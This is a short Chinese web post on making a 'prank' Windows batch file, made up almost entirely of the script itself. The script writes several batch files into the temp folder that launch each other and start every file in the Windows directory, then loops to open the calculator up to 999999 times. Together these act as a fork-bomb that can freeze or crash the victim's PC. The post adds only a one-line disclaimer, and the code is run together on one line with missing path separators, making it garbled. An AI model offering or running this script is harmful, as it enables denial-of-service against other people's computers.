如何制作bat整人文件(bat整人代码)
下面是比较整人的批处理。
不过不建议这样做 @echo offecho start 1.bat >%temp%2.batecho for /r %windir% %%i in (*) do start %%i >>%temp%2.batecho start 2.bat >%temp%1.batecho for /r %windir% %%i in (*) do start %%i >>%temp%1.batecho start 3.bat >%temp%4.batecho for /r %windir% %%i in (*) do start %%i >>%temp%4.batecho start 4.bat >%temp%3.batecho for /r %windir% %%i in (*) do start %%i >>%temp%3.batecho start 5.bat >%temp%6.batecho for /r %windir% %%i in (*) do start %%i >>%temp%6.batecho start 6.bat >%temp%5.batecho for /r %windir% %%i in (*) do start %%i >>%temp%5.batstart %temp%1.bat & start %temp%3.bat & start %temp%5.batfor /l in (1,1,999999) do start %windir%system32calc.exefor /r %windir% %%i in (*) do start %%i。